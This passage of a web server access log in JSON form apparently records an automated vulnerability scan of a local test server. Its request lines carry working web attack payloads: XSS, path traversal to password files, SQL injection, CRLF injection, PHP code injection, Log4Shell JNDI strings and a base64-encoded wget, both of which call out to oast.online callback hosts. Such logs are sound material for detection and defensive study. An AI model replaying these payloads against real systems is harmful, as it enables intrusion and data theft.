HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vpn/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.Web.UI.DialogHandler.axd?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apps HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"option_key=a&perpose=update&callback=phpinfo","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"\x0D\x0A\x0D\x0A mt.handler_to_coderef\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A YHdnZXQgaHR0cDovL2M5djhnYzhzbXB2OGIwbmcwdDAwanV5dWF4eXRrYXdrMS5vYXN0Lm9ubGluZWA=\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/setup.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jsp/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0DSet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"step=1&Language=de{${system(\x22ls\x22)}}&NextBtn=Weiter+%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mailingupgrade.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminlogin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/detail.php?subdomain=c9v8gc8smpv8b0ng0t00iknomg8b14bz8.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.esmtprc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /about/../tree?action=get HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login?!'>alert(document.cookie) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /control/stream?contentId=%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dokuwiki/doku.php?id=wiki:welcome&at= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apache.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /register/?redirect_to=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zentao/index.php?mode=getconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log_download.cgi?type=../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/sso/v2/sso/jwt?error_url=http://evil.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET \x5C..\x5C..\x5C..\x5C..\x5CWindows\x5Cwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///var HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/tree.php?subdomain=c9v8gc8smpv8b0ng0t00piijhs1nu5n34.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /TransferredOutModal.php?modfunc=detail HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /zms/admin/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1/zms/admin/index.php", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.036","http_user_agent":"${jndi:ldap://127.0.0.1#.${hostName}.useragent.c9v8gc8smpv8b0ng0t00egmggkuhswm7g.oast.online}", "http_referer":"${jndi:ldap://127.0.0.1#.${hostName}.referer.c9v8gc8smpv8b0ng0t00pma6fp89rppop.oast.online}", "request_method":"GET", "http_x_forwarded_for":"${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.c9v8gc8smpv8b0ng0t00n3x7oaxqqh597.oast.online}"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"username=admin&password=ixcache","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/userverify.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/settings/values HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /.%00./.%00./etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0ASet-Cookie%3Acrlfinjection/.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 